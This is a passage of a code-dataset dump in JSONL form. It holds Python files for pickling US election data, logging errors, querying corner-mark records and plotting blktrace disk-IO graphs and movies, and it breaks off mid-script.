for key in obj:\n if type(obj[key]) == str:\n if obj[key].lower() == \"false\" or obj[key].lower() == \"no\":\n obj[key] = False\n return obj\n if obj[key].lower() == \"true\" or obj[key].lower() == \"yes\":\n obj[key] = True\n return obj\n return obj\n\n\ndef cast_nulls(obj):\n for key in obj:\n if obj[key] == \"\":\n obj[key] = None\n return obj\n\n\ndef cast_types(obj):\n obj = cast_nulls(obj)\n obj = cast_bools(obj)\n obj = cast_dates(obj)\n return obj\n\n\ndef pickle_parties():\n parties = [\n cast_types(party)\n for party in read_csv_to_dict(os.path.join(DB, \"parties/parties.csv\"))\n ]\n with open(os.path.join(PKL_DIR, \"parties.pkl\"), \"wb\") as pkl_file:\n pickle.dump(parties, pkl_file, protocol=2)\n\n\ndef pickle_years():\n with open(os.path.join(PKL_DIR, \"years.pkl\"), \"wb\") as pkl_file:\n pickle.dump(YEARS, pkl_file, protocol=2)\n\n\ndef pickle_electoral_votes():\n for YEAR in YEARS:\n vote_zones = []\n electoral_votes_for_year = os.path.join(\n ELECTIONS_DIR, YEAR, \"electoral-votes.csv\"\n )\n\n if os.path.exists(electoral_votes_for_year):\n votes_data = read_csv_to_dict(electoral_votes_for_year)\n for vote_zone in votes_data:\n vote_zone = cast_types(vote_zone)\n vote_zone[\"type\"] = (\n \"by-district\" if vote_zone[\"district\"] else \"statewide\"\n )\n vote_zones.append(vote_zone)\n\n os.makedirs(os.path.join(PKL_DIR, YEAR), exist_ok=True)\n with open(\n os.path.join(PKL_DIR, \"{}/electoral-votes.pkl\".format(YEAR)), \"wb\"\n ) as pkl_file:\n pickle.dump(vote_zones, pkl_file, protocol=2)\n\n\ndef pickle_seats_for_body(government_level, chosen_branch):\n if isinstance(government_level, str):\n government_level = [government_level]\n\n for YEAR in YEARS:\n seats = []\n seat_dir_for_level = os.path.join(\n ELECTIONS_DIR, YEAR, \"seats\", *government_level\n )\n\n for path, dirs, files in os.walk(seat_dir_for_level):\n path_parts = path.split(os.path.sep)\n level_components = path_parts[-len(government_level) :]\n\n if len(dirs) == 0 and chosen_branch == path_parts[-1]:\n for file in files:\n seat_type = file.replace(\".csv\", \"\")\n seats_data = read_csv_to_dict(os.path.join(path, file))\n for seat in seats_data:\n seat = cast_types(seat)\n seat[\"jurisdiction\"] = \"/\".join(government_level)\n seat[\"seat_type\"] = seat_type\n seats.append(seat)\n elif len(dirs) == 0 and level_components == government_level:\n branch_singleton_file = None\n for file in files:\n file_name = file.replace(\".csv\", \"\")\n if file_name == chosen_branch:\n branch_singleton_file = file\n\n if branch_singleton_file:\n seats_data = read_csv_to_dict(\n os.path.join(path, branch_singleton_file)\n )\n for seat in seats_data:\n seat = cast_types(seat)\n seat[\"jurisdiction\"] = \"/\".join(government_level)\n seats.append(seat)\n else:\n pass\n else:\n pass\n\n os.makedirs(os.path.join(PKL_DIR, YEAR), exist_ok=True)\n with open(\n os.path.join(\n PKL_DIR,\n \"{}/{}-{}-seats.pkl\".format(\n YEAR, government_level[-1], chosen_branch\n ),\n ),\n \"wb\",\n ) as pkl_file:\n pickle.dump(seats, pkl_file, protocol=2)\n\n\ndef pickle_elections():\n for YEAR in YEARS:\n elections = []\n election_dir = os.path.join(ELECTIONS_DIR, YEAR, \"calendars\")\n jurisdiction = \"\"\n for path, dirs, files in os.walk(election_dir):\n if len(dirs) == 0:\n try:\n per_day_metadata = {\n \"__\".join(\n [\n row[\"state\"],\n row[\"election_date\"],\n row[\"election_variant\"],\n ]\n ): row[\"election_notes\"]\n for row in read_csv_to_dict(\n os.path.join(path, \"meta.csv\")\n )\n }\n except FileNotFoundError:\n per_day_metadata = {}\n\n for file in files:\n election_type = file.replace(\".csv\", \"\")\n\n if election_type == \"meta\":\n continue\n\n elections_data = read_csv_to_dict(os.path.join(path, file))\n for election in elections_data:\n election = cast_types(election)\n\n election[\"election_day_notes\"] = per_day_metadata.get(\n \"__\".join(\n [\n election[\"state\"],\n election[\"election_date\"].strftime(\n \"%Y-%m-%d\"\n ),\n election.get(\"election_variant\", \"\"),\n ]\n ),\n \"\",\n )\n\n election[\"jurisdiction\"] = jurisdiction\n election[\"election_type\"] = election_type\n elections.append(election)\n jurisdiction = \"\"\n else:\n jurisdiction = dirs[0]\n\n os.makedirs(os.path.join(PKL_DIR, YEAR), exist_ok=True)\n with open(\n os.path.join(PKL_DIR, \"{}/elections.pkl\".format(YEAR)), \"wb\"\n ) as pkl_file:\n pickle.dump(elections, pkl_file, protocol=2)\n\n\ndef pickle_data():\n pickle_parties()\n pickle_years()\n\n pickle_electoral_votes()\n\n pickle_seats_for_body(\"federal\", \"legislative\")\n pickle_seats_for_body(\"federal\", \"executive\")\n\n for state in us.STATES:\n if state.statehood_year: # Taxation w/o representation! Nix D.C.\n pickle_seats_for_body([\"state\", state.abbr.lower()], \"legislative\")\n pickle_seats_for_body([\"state\", state.abbr.lower()], \"executive\")\n pickle_seats_for_body([\"state\", state.abbr.lower()], \"judicial\")\n\n pickle_elections()\n\n\nif __name__ == \"__main__\":\n pickle_data()\n","repo_name":"The-Politico/us-elections","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":7582,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"37199705831","text":"import traceback\nimport sys\nfrom logs.models import Error\n\n\ndef error_log(file, category=None, user=None, ip=None):\n type_, value, _traceback = sys.exc_info()\n output = 'Type: {} \\n Value: {} \\n'.format(type_, value)\n trace = traceback.extract_tb(sys.exc_info()[2])\n # Add the event to the log\n output += 'Traceback is: \\n'\n for (file, linenumber, affected, line) in trace:\n output += '- Error at function {}\\n'. format(affected)\n output += '- At: {} {}\\n'. format(file, linenumber)\n output += '- Source: {}\\n\\n'.format(line)\n return Error.objects.create(url=file, error=output, category=category, ip=ip, user=user)","repo_name":"pedrokasak/challenger_inatel","sub_path":"logs/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11334750584","text":"#!/usr/bin/env python\n# coding: utf8\nimport datetime\n\nfrom extends import db\n__author__ = 'ye shuo'\n\n\nclass AdminCornerDao(object):\n \"\"\"\n 角标DAO\n \"\"\"\n @staticmethod\n def __gen_wheres_values(**kwargs):\n \"\"\"\n 生成查询条件及值\n :param kwargs:\n :rtype tuple:\n :return:\n \"\"\"\n wheres = []\n values = dict()\n group_name = kwargs.get(\"group_name\", \"\")\n\n if group_name:\n wheres.append(u\"group_name like $group_name\")\n values[\"group_name\"] = u\"%{}%\".format(group_name)\n\n where_str = u\" and \".join(wheres) if wheres else None\n\n return where_str, values\n\n @staticmethod\n def query_list(whats=None, group_name=None, limit=None, offset=None):\n \"\"\"\n 分页查询信息\n :param whats: 返回的字段\n :param group_name:\n :param limit:\n :param offset:\n :return:\n \"\"\"\n where_str, values = AdminCornerDao.__gen_wheres_values(group_name=group_name)\n\n if not whats:\n whats = u\"id, group_name, created_time, image, updated_time\"\n results = db.slave.select(\n tables=u\"corner_marks\",\n what=whats,\n vars=values,\n where=where_str,\n limit=limit,\n offset=offset,\n order=u\"updated_time DESC\"\n )\n\n return results\n\n @staticmethod\n def get_total_count(group_name=None):\n \"\"\"\n 获取对应的条数\n :param group_name:\n :return:\n \"\"\"\n where_str, values = AdminCornerDao.__gen_wheres_values(group_name=group_name)\n\n counts = db.slave.select(\n tables=u'corner_marks',\n what=u\"count(id) as counts\",\n vars=values,\n where=where_str\n ).first().counts\n\n return counts\n\n @staticmethod\n def save(group_name, *images):\n created_time = datetime.datetime.now()\n insert_values = [{\"group_name\": group_name, \"created_time\": created_time, \"image\": img}\n for img in images]\n\n _ids = db.master.multiple_insert(tablename=\"corner_marks\", values=insert_values)\n\n return _ids\n\n @staticmethod\n def delete(_ids):\n \"\"\"\n 删除\n :param _ids:\n :return:\n \"\"\"\n result = db.master.delete('corner_marks', vars={'ids': _ids}, where=u\"id in $ids\")\n\n return result\n\n @staticmethod\n def query_group_name_list():\n \"\"\"\n 所有的角标分组名\n :return:\n \"\"\"\n\n results = db.slave.select(tables=u\"corner_marks\", what=u\"group_name\", group=u\"group_name\")\n\n return results\n\ncornermark = AdminCornerDao\n\n","repo_name":"caowenbin/dabai-cms-server","sub_path":"dao/cornerdao.py","file_name":"cornerdao.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"11008615059","text":"import sys, os, signal, time, subprocess, tempfile, signal\nfrom optparse import OptionParser\n\nblktrace_only = False\n\ntry:\n from matplotlib import rcParams\n from matplotlib.font_manager import fontManager, FontProperties\n import numpy\nexcept:\n sys.stderr.write(\"matplotlib not found, using blktrace only mode\\n\")\n blktrace_only = True\n\nclass AnnoteFinder:\n \"\"\"\n callback for matplotlib to display an annotation when points are clicked on. The\n point which is closest to the click and within xtol and ytol is identified.\n \n Register this function like this:\n \n scatter(xdata, ydata)\n af = AnnoteFinder(xdata, ydata, annotes)\n connect('button_press_event', af)\n \"\"\"\n\n def __init__(self, axis=None):\n if axis is None:\n self.axis = gca()\n else:\n self.axis= axis\n self.drawnAnnotations = {}\n self.links = []\n \n def clear(self):\n for k in self.drawnAnnotations.keys():\n self.drawnAnnotations[k].set_visible(False)\n\n def __call__(self, event):\n if event.inaxes:\n if event.button != 1:\n self.clear()\n draw()\n return\n clickX = event.xdata\n clickY = event.ydata\n if (self.axis is None) or (self.axis==event.inaxes):\n self.drawAnnote(event.inaxes, clickX, clickY)\n \n def drawAnnote(self, axis, x, y):\n \"\"\"\n Draw the annotation on the plot\n \"\"\"\n if self.drawnAnnotations.has_key((x,y)):\n markers = self.drawnAnnotations[(x,y)]\n markers.set_visible(not markers.get_visible())\n draw()\n else:\n t = axis.text(x,y, \"(%3.2f, %3.2f)\"%(x,y), bbox=dict(facecolor='red',\n alpha=0.8))\n self.drawnAnnotations[(x,y)] = t\n draw()\n\ndef dev2num(dev):\n s2 = dev.replace(',', '.')\n return float(s2)\n\ndef flag2num(flag):\n if flag == 'Q':\n return 0.0\n if flag == 'C':\n return 1.0\n if flag == 'U':\n return 2.0\n return 3.0\n sys.stderr.write(\"unknown flag %s\\n\" %flag)\n\ndef command2num(com):\n if com[0] == 'R':\n return 0.0\n if com[0] == 'W':\n return 1.0\n return 2.0\n sys.stderr.write(\"unknown command %s\\n\" % com)\n\ndef loaddata(fh,delimiter=None, converters=None):\n\n def iter(fh, delimiter, converters):\n global devices_sector_max\n\n if converters is None: converters = {}\n last_sector = None\n last_rw = None\n last_row = None\n last_end = None\n last_cmd = None\n last_size = None\n last_dev = None\n for i,line in enumerate(fh):\n if not line.startswith('C'):\n continue\n row = [converters.get(i,float)(val) for i,val in enumerate(line.split(delimiter))]\n this_time = row[7]\n this_dev = row[8]\n this_sector = row[4]\n this_rw = row[1]\n this_size = row[5] / 512\n\n devices_sector_max[this_dev] = max(this_sector + this_size,\n devices_sector_max.get(this_dev, 0));\n\n if (last_row and this_rw == last_rw and\n this_dev == last_dev and\n this_time - last_time < .5 and last_size < 512 and\n this_sector == last_end):\n last_end += this_size\n last_size += this_size\n last_row[5] += row[5]\n continue\n \n if last_row:\n for x in last_row:\n yield x\n \n last_row = row\n last_sector = this_sector\n last_time = this_time\n last_rw = this_rw\n last_end = this_sector + this_size\n last_size = this_size\n last_dev = this_dev\n if last_row:\n for x in last_row:\n yield x\n\n X = numpy.fromiter(iter(fh, delimiter, converters), dtype=float)\n return X\n\ndef sort_by_time(data):\n def sort_iter(sorted):\n for x in sorted:\n for field in data[x]:\n yield field\n\n times = data[:,7]\n sorted = times.argsort()\n X = numpy.fromiter(sort_iter(sorted), dtype=float)\n shapeit(X)\n return X\n\ndef data_movie(data):\n def xycalc(sector):\n if sector < yzoommin or sector > yzoommax:\n return None\n sector = sector - yzoommin\n sector = sector / sectors_per_cell\n yval = floor(sector / num_cells)\n xval = sector % num_cells\n return (xval, yval)\n\n def add_frame(prev, ins, max):\n if len(prev) > max:\n del prev[0]\n prev.append(ins)\n\n def graphit(a, prev):\n def plotone(a, x, y, color):\n a.plot(x, y, 's', color=color, mfc=color,\n mec=color, markersize=options.movie_cell_size)\n a.hold(True)\n alpha = 0.1\n a.hold(False)\n\n for x in range(len(prev)):\n readx, ready, writex, writey = prev[x]\n if x == len(prev) - 1:\n alpha = 1.0\n\n if readx:\n color = bluemap(alpha)\n plotone(a, readx, ready, color)\n if writex:\n color = greenmap(alpha)\n plotone(a, writex, writey, color)\n alpha += 0.1\n \n options.movie_cell_size = float(options.movie_cell_size)\n num_cells = 600 / options.movie_cell_size\n\n total_cells = num_cells * num_cells\n sector_range = yzoommax - yzoommin\n sectors_per_cell = sector_range / total_cells\n total_secs = xmax - xmin\n movie_length = int(options.movie_length)\n movie_fps = int(options.movie_frames)\n total_frames = movie_length * movie_fps\n secs_per_frame = total_secs / total_frames\n print(f\"total frames is {total_frames} secs per frame = {secs_per_frame}\")\n start_second = xmin\n\n times = data[:,7]\n figindex = 0\n\n png_dir = tempfile.mkdtemp(dir=os.path.dirname(options.output))\n movie_name = options.output\n fname, fname_ext = os.path.splitext(options.output)\n fname = os.path.join(png_dir, fname);\n\n i = 0\n prev = []\n f = figure(figsize=(8,6))\n a = axes([ 0.10, 0.29, .85, .68 ])\n tput_ax = axes([ 0.10, 0.19, .85, .09 ])\n seek_ax = axes([ 0.10, 0.07, .85, .09 ])\n\n plot_seek_count(seek_ax, None, data, '-', None)\n ticks = seek_ax.get_yticks()\n ticks = list(arange(0, ticks[-1] + ticks[-1]/3, ticks[-1]/3))\n seek_ax.set_yticks(ticks)\n seek_ax.set_yticklabels( [ str(int(x)) for x in ticks ], fontsize='x-small')\n seek_ax.set_ylabel('Seeks / sec', fontsize='x-small')\n seek_ax.set_xlabel('Time (seconds)', fontsize='x-small')\n seek_ax.grid(True)\n\n plot_throughput(tput_ax, None, data, '-', None)\n\n # cut down the number of yticks to something more reasonable\n ticks = tput_ax.get_yticks()\n ticks = list(arange(0, ticks[-1] + ticks[-1]/3, ticks[-1]/3))\n tput_ax.set_yticks(ticks)\n tput_ax.set_xticks([])\n tput_ax.grid(True)\n\n if ticks[-1] < 3:\n tput_ax.set_yticklabels( [ \"%.1f\" % x for x in ticks ],\n fontsize='x-small')\n else:\n tput_ax.set_yticklabels( [ \"%d\" % x for x in ticks ],\n fontsize='x-small')\n\n tput_ax.set_ylabel('MB/s', fontsize='x-small')\n\n a.set_xticklabels([])\n a.set_yticklabels([])\n a.set_xlim(0, num_cells)\n a.set_ylim(0, num_cells)\n a.hold(False)\n datai = 0\n datalen = len(data)\n bluemap = get_cmap(\"Blues\")\n greenmap = get_cmap(\"Greens\")\n\n while i < total_frames and datai < datalen:\n start = start_second + i * secs_per_frame\n i += 1\n end = start + secs_per_frame\n if datai >= datalen or data[datai][7] > xmax:\n break\n write_xvals = []\n write_yvals = []\n read_xvals = []\n read_yvals = []\n while datai < datalen and data[datai][7] < end:\n row = data[datai]\n time = row[7]\n if time < start:\n print(f\"dropping time {time} < start {start}\")\n continue\n datai += 1\n sector = row[4]\n size = int(max(row[5] / 512, 1))\n rbs = row[1]\n cell = 0\n while cell < size:\n xy = xycalc(sector)\n sector += sectors_per_cell\n cell += sectors_per_cell\n if xy:\n if rbs:\n write_xvals.append(xy[0])\n write_yvals.append(xy[1])\n else:\n read_xvals.append(xy[0])\n read_yvals.append(xy[1])\n if not read_xvals and not write_xvals:\n continue\n\n add_frame(prev, (read_xvals, read_yvals, write_xvals, write_yvals), 10)\n graphit(a, prev)\n\n a.set_xticklabels([])\n a.set_yticklabels([])\n a.set_xlim(0, num_cells)\n a.set_ylim(0, num_cells)\n line = seek_ax.axvline(x=end, color='k')\n line2 = tput_ax.axvline(x=end, color='k')\n tput_ax.set_xlim(xmin, xmax)\n seek_ax.set_xlim(xmin, xmax)\n print(f\"start {start} secs end {end} secs frame {figindex}\")\n f.savefig(\"%s-%.6d.%s\" % (fname, figindex, \"png\"), dpi=options.dpi)\n line.set_linestyle('None')\n line2.set_linestyle('None')\n figindex += 1\n a.hold(True)\n\n if mencoder_found == \"png2theora\" and movie_name.endswith('.ogg'):\n os.system(\"png2theora -o %s %s\" % (movie_name, fname) + '-%06d.png')\n else:\n os.system(\"mencoder mf://%s*.png -mf type=png:fps=%d -of mpeg -ovc lavc -lavcopts vcodec=mpeg2video:vbitrate=%s -oac copy -o %s\" % (fname, movie_fps, options.movie_vbitrate, movie_name))\n\n for root, dirs, files in os.walk(png_dir):\n for name in files:\n os.remove(os.path.join(root, name))\n os.rmdir(png_dir)\n\ndef plot_data(ax, rw, data, style, label, alpha=1):\n def reduce_plot():\n reduce = {}\n skipped = 0\n for i in range(len(times)):\n x = floor(times[i] / x_per_cell)\n y = floor(sectors[i] / y_per_cell)\n if x in reduce and y in reduce[x]:\n skipped += 1\n continue\n y += 1\n h = reduce.setdefault(x, {})\n h[y] = 1\n yield x * x_per_cell\n yield y * y_per_cell\n xcells = 325.0 * options.io_graph_cell_multi\n x_per_cell = (xmax - xmin) / xcells\n ycells = 80.0 * options.io_graph_cell_multi\n y_per_cell = (yzoommax - yzoommin) / ycells\n\n if rw is None:\n if options.reads_only:\n rw = 0\n if options.writes_only:\n rw = 1\n if rw != None:\n if options.reads_only and rw != 0:\n return\n if options.writes_only and rw != 1:\n return\n rbs = data[:,1]\n data = data[numpy.where(rbs == rw)]\n times = data[:,7]\n sectors = data[:,4]\n if len(times) > 0:\n t = numpy.fromiter(reduce_plot(), dtype=float)\n t.shape = (len(t)//2, 2)\n xdata = t[:,0]\n ydata = t[:,1]\n lines = ax.plot(t[:,0], t[:,1], options.io_graph_dots, mew=0,\n ms=options.io_graph_marker_size,\n label=label, alpha=alpha)\n return lines\n return []\n\ndef add_roll(roll, max, num):\n if len(roll) == max:\n del roll[0]\n roll.append(num)\n total = 0.0\n for x in roll:\n total += x\n return total / len(roll)\n\ndef plot_throughput(ax, rw, data, style, label, alpha=1):\n def tput_iter(sizes,times):\n bytes = 0.0\n sec = None\n roll = []\n for x in range(len(sizes)):\n size = sizes[x]\n cur_time = floor(times[x])\n if sec == None:\n avg = add_roll(roll, options.rolling_avg, 0.0)\n yield (0.0, avg)\n sec = cur_time\n continue\n if sec != cur_time:\n avg = add_roll(roll, options.rolling_avg, bytes)\n yield (sec, avg / (1024 * 1024))\n bytes = 0\n sec = cur_time\n bytes += size\n scale = times[-1] - sec\n if scale > 0 and scale < 1:\n bytes += sizes[-1]\n bytes = bytes / scale\n avg = add_roll(roll, options.rolling_avg, bytes)\n yield(ceil(times[-1]), avg / (1024 * 1024))\n\n if rw is None:\n if options.reads_only:\n rw = 0\n if options.writes_only:\n rw = 1\n if rw != None:\n if options.reads_only and rw != 0:\n return\n if options.writes_only and rw != 1:\n return\n rbs = data[:,1]\n data = data[numpy.where(rbs == rw)]\n\n if len(data) == 0:\n return\n\n times = numpy.array([])\n tput = numpy.array([])\n for x,y in tput_iter(data[:,5], data[:,7]):\n times = numpy.append(times, x)\n tput = numpy.append(tput, y)\n\n return ax.plot(times, tput, style, label=label, alpha=alpha)\n\ndef plot_seek_count(ax, rw, data, style, label, alpha=1):\n def iter(sectors, times):\n count = 0.0\n last_dev = {}\n # last holds an array (sector, size)\n\n last = None\n last_size = None\n sec = None\n\n roll = []\n for x in range(len(sectors)):\n sector = sectors[x]\n io_size = data[x][5] / 512\n dev = data[x][8]\n last, last_size = last_dev.get(dev, (None, None))\n cur_time = floor(times[x])\n if sec == None:\n avg = add_roll(roll, options.rolling_avg, 0.0)\n yield (0.0, avg)\n sec = cur_time\n continue\n if sec != cur_time:\n avg = add_roll(roll, options.rolling_avg, count)\n yield (sec, avg)\n count = 0\n sec = cur_time\n if last != None:\n diff = abs((last + last_size) - sector)\n if diff > 128:\n count += 1\n last_dev[dev] = (sector, io_size)\n\n scale = times[-1] - sec\n if scale > 0 and scale < 1:\n dev = data[-1][8]\n last, last_size = last_dev[dev]\n sector = sectors[-1]\n diff = abs((last + last_size) - sector)\n if diff > 128:\n count += 1\n count = count / scale\n avg = add_roll(roll, options.rolling_avg, count)\n yield(ceil(times[-1]), avg)\n\n if rw is None:\n if options.reads_only:\n rw = 0\n if options.writes_only:\n rw = 1\n\n if rw != None:\n if options.reads_only and rw != 0:\n return\n if options.writes_only and rw != 1:\n return\n rbs = data[:,1]\n data = data[numpy.where(rbs == rw)]\n\n if len(data) == 0:\n return\n\n times = numpy.array([])\n counts = numpy.array([])\n for x,y in iter(data[:,4], data[:,7]):\n times = numpy.append(times, x)\n counts = numpy.append(counts, y)\n\n return ax.plot(times, counts, style, label=label, alpha=alpha)\n\ndef run_one_blktrace(trace, device):\n args = [ \"blktrace\", \"-d\", device, \"-o\", trace, \"-b\", \"2048\" ]\n if not options.full_trace:\n args += [ \"-a\", \"complete\" ]\n print(\" \".join(args))\n return os.spawnlp(os.P_NOWAIT, *args)\n\ndef run_blktrace(trace, devices):\n pids = []\n for x in devices:\n tmp = x.replace('/', '.')\n if len(devices) > 1:\n this_trace = trace + \".\" + tmp\n else:\n this_trace = trace\n pids.append(run_one_blktrace(this_trace, x))\n return pids\n\nblktrace_pids = []\ndef run_prog(program, trace, devices):\n global blktrace_pids\n def killblktracers(signum, frame):\n global blktrace_pids\n cpy = blktrace_pids\n blktrace_pids = []\n for x in cpy:\n os.kill(x, signal.SIGTERM)\n pid, err = os.wait()\n if err:\n sys.stderr.write(\"exit due to blktrace failure %d\\n\" % err)\n sys.exit(1)\n\n blktrace_pids = run_blktrace(trace, devices)\n\n # force some IO, blktrace does timestamps from the first IO\n if len(devices) > 1:\n for x in devices:\n try:\n os.system(\"dd if=%s of=/dev/zero bs=16k count=1 iflag=direct > /dev/null 2>&1\" % x)\n except:\n print(f\"O_DIRECT read from {x} failed trying buffered\")\n b = file(x).read(1024 * 1024)\n\n signal.signal(signal.SIGTERM, killblktracers)\n signal.signal(signal.SIGINT, killblktracers)\n sys.stderr.write(\"running :%s:\\n\" % program)\n os.system(program)\n sys.stderr.write(\"done running %s\\n\" % program)\n killblktracers(None, None)\n sys.stderr.write(\"blktrace done\\n\")\n\n signal.signal(signal.SIGTERM, signal.SIG_DFL)\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n\ndef run_blkparse(trace, converters):\n tracefiles = []\n data = numpy.array([])\n seen = {}\n print(f\"run_blkparse on %s{trace}\")\n if not os.path.exists(trace + \"blktrace.0\"):\n dirname = os.path.dirname(trace) or \".\"\n files = os.listdir(dirname)\n joinname = os.path.dirname(trace) or \"\"\n for x in files:\n x = os.path.join(joinname, x)\n if x.startswith(trace) and \".blktrace.\" in x:\n i = x.rindex('.blktrace.')\n cur = x[0:i]\n if cur not in seen:\n tracefiles.append(x[0:i])\n seen[cur] = 1\n else:\n tracefiles.append(trace)\n\n for x in tracefiles:\n print(f\"using tracefile {x}\")\n p = os.popen('blkparse -q -i ' + x +\n ' -f \"%a %d %M %m %S %N %s %5T.%9t %D\\n\"')\n cur = loaddata(p, converters=converters)\n data = numpy.append(data, cur)\n return data\n\ndef shapeit(X):\n lines = len(X) // 9\n X.shape = (lines, 9)\n\ndef unshapeit(X):\n lines = len(X) * 9\n X.shape = (lines, 1)\n\ndef getlabel(i):\n if i < len(options.label):\n return options.label[i]\n return \"\"\n\ndef line_picker(line, mouseevent):\n if mouseevent.xdata is None: return False, dict()\n print(f\"{mouseevent.xdata} {mouseevent.ydata}\")\n return False, dict()\n\ndef running_config():\n\t\"\"\"\n\tReturn path of config file of the currently running kernel\n\t\"\"\"\n\tversion = subprocess.getoutput('uname -r')\n\tfor config in ('/proc/config.gz', \\\n '/boot/config-%s' % version,\n '/lib/modules/%s/build/.config' % version):\n\t\tif os.path.isfile(config):\n\t\t\treturn config\n\treturn None\n\n\ndef check_for_kernel_feature(feature):\n\tconfig = running_config()\n\n\tif not config:\n\t\tsys.stderr.write(\"Can't find kernel config file\")\n\n\tif config.endswith('.gz'):\n\t\tgrep = 'zgrep'\n\telse:\n\t\tgrep = 'grep'\n\tgrep += ' ^CONFIG_%s= %s' % (feature, config)\n\n\tif not subprocess.getoutput(grep):\n\t\tsys.stderr.write(\"Kernel doesn't have a %s feature\\n\" % (feature))\n\t\tsys.exit(1)\n\ndef check_for_debugfs():\n tmp = subprocess.getoutput('mount | grep /sys/kernel/debug')\n tmp = len(tmp)\n if tmp == 0:\n sys.stderr.write(\"debugfs not mounted (/sys/kernel/debug)\\n\")\n sys.exit(1)\n\ndef check_for_mencoder():\n dirs = os.getenv('PATH', os.path.defpath).split(os.path.pathsep)\n for dir in dirs:\n fname = os.path.join(dir, 'png2theora')\n if os.path.isfile(fname):\n return \"png2theora\"\n for dir in dirs:\n fname = os.path.join(dir, 'mencoder')\n if os.path.isfile(fname):\n return \"mencoder\"\n return None\n\ndef translate_sector(dev, sector):\n return device_translate[dev] + sector;\n\nusage = \"usage: %prog [options]\"\nparser = OptionParser(usage=usage)\nparser.add_option(\"-d\", \"--device\", help=\"Device for blktrace\", default=[],\n action=\"append\")\nparser.add_option(\"-t\", \"--trace\", help=\"blktrace file\", default=[],\n action=\"append\")\nparser.add_option(\"-p\", \"--prog\", help=\"exec program\", default=\"\")\nparser.add_option(\"\", \"--full-trace\", help=\"Don't filter blktrace events\",\n default=False, action=\"store_true\")\n\nif not blktrace_only:\n parser.add_option(\"-z\", \"--zoom\", help=\"Zoom range min:max (in MB)\",\n default=\"\")\n parser.add_option(\"-x\", \"--xzoom\", help=\"Time range min:max (seconds)\",\n default=\"\")\n parser.add_option(\"-o\", \"--output\", help=\"output file\", default=\"trace.png\")\n parser.add_option(\"-l\", \"--label\", help=\"label\", default=[],\n action=\"append\")\n parser.add_option(\"\", \"--dpi\", help=\"dpi\", default=120)\n parser.add_option(\"\", \"--io-graph-dots\", help=\"Disk IO dot style\",\n default='s')\n parser.add_option(\"\", \"--io-graph-marker-size\", help=\"Disk IO dot size\",\n default=1.5, type=\"float\")\n parser.add_option(\"\", \"--io-graph-cell-multi\", help=\"Multiplier for cells\",\n default=2, type=\"float\")\n parser.add_option(\"-I\", \"--no-io-graph\", help=\"Don't create an IO graph\",\n default=False, action=\"store_true\")\n parser.add_option(\"-r\", \"--rolling-avg\",\n help=\"Rolling average for seeks and throughput (in seconds)\",\n default=None)\n\n parser.add_option(\"-i\", \"--interactive\", help=\"Use matplotlib interactive\",\n action=\"store_true\", default=False)\n parser.add_option(\"\", \"--backend\",\n help=\"matplotlib backend (QtAgg, TkAgg, GTKAgg) case sensitive\",\n default=\"QtAgg\")\n parser.add_option(\"-T\", \"--title\", help=\"Graph Title\", default=\"\")\n parser.add_option(\"-R\", \"--reads-only\", help=\"Graph only reads\",\n default=False, action=\"store_true\")\n parser.add_option(\"-W\", \"--writes-only\", help=\"Graph only writes\",\n default=False, action=\"store_true\")\n\n mencoder_found = check_for_mencoder()\n if mencoder_found:\n parser.add_option(\"-m\", \"--movie\", help=\"Generate an IO movie\",\n default=False, action=\"store_true\")\n parser.add_option(\"\", \"--movie-frames\",\n help=\"Number of frames per second\",\n default=10)\n parser.add_option(\"\", \"--movie-length\", help=\"Movie length in seconds\",\n default=30)\n parser.add_option(\"\", \"--movie-cell-size\",\n help=\"Size in pixels of the IO cells\", default=2)\n parser.add_option(\"\", \"--movie-vbitrate\",\n help=\"Mencoder vbitrate option (default 16000)\",\n default=\"16000\")\n\n(options,args) = parser.parse_args()\n\nif not blktrace_only:\n # rcParams['numerix'] = 'numpy'\n if options.interactive:\n rcParams['backend'] = options.backend\n rcParams['interactive'] = 'True'\n else:\n rcParams['backend'] = 'Agg'\n rcParams['interactive'] = 'False'\n from pylab import *\n\nif not options.trace:\n parser.print_help()\n sys.exit(1)\n\nconverters = {}\nconverters[0] = flag2num\nconverters[1] = command2num\nconverters[8] = dev2num\n\nif options.prog:\n check_for_kernel_feature(\"DEBUG_FS\")\n check_for_kernel_feature(\"BLK_DEV_IO_TRACE\")\n check_for_debugfs()\n\n if not options.trace or not options.device:\n sys.stderr.write(\"blktrace output file or device not specified\\n\")\n sys.exit(1)\n run_prog(options.prog, options.trace[0], options.device)\n if blktrace_only:\n sys.exit(0)\n\n if not options.title:\n options.title = options.prog\n\ndata = numpy.array([])\nruns = []\nmust_sort = True\n\nfor x in options.trace:\n devices_sector_max = {}\n run = run_blkparse(x, converters)\n\n device_translate = {}\n total = 0\n if len(devices_sector_max) > 1:\n must_sort = True\n for x in devices_sector_max:\n device_translate[x] = total + devices_sector_max[x]\n total += devices_sector_max[x]\n shapeit(run)\n if len(devices_sector_max) > 1:\n for x in run:\n sector = x[4]\n dev = x[8]\n x[4] = device_translate[dev] + sector\n \n sorted = sort_by_time(run)\n run = sorted\n\n unshapeit(run)\n runs.append(run)\n data = numpy.append(data, run)\n\nshapeit(data)\nfor x in runs:\n shapeit(x)\n if len(x) == 0:\n sys.stderr.write(\"Empty blktrace run found, exiting\\n\")\n sys.exit(1)\n\nif must_sort:\n sorted = sort_by_time(data)\n data = sorted\n\n# try to drop out the least common data points by creating\n# a historgram of the sectors seen.\nsectors = data[:,4]\nsizes = data[:,5]\nymean = numpy.mean(sectors)\nsectormax = numpy.max(sectors)\nsectormin = numpy.min(sectors)\n\nif not options.zoom or ':' not in options.zoom:\n def add_range(hist, step, sectormin, start, size):\n while size > 0:\n slot = int((start - sectormin) / step)\n slot_start = step * slot + sectormin\n if slot >= len(hist) or slot < 0:\n sys.stderr.write(\"illegal slot %d start %d step %d\\n\" %\n (slot, start, step))\n return\n else:\n val = hist[slot]\n this_size = min(size, start - slot_start)\n this_count = max(this_size / 512, 1)\n hist[slot] = val + this_count\n size -= this_size\n start += this_count\n \n hist = [0] * 11\n step = (sectormax - sectormin) / 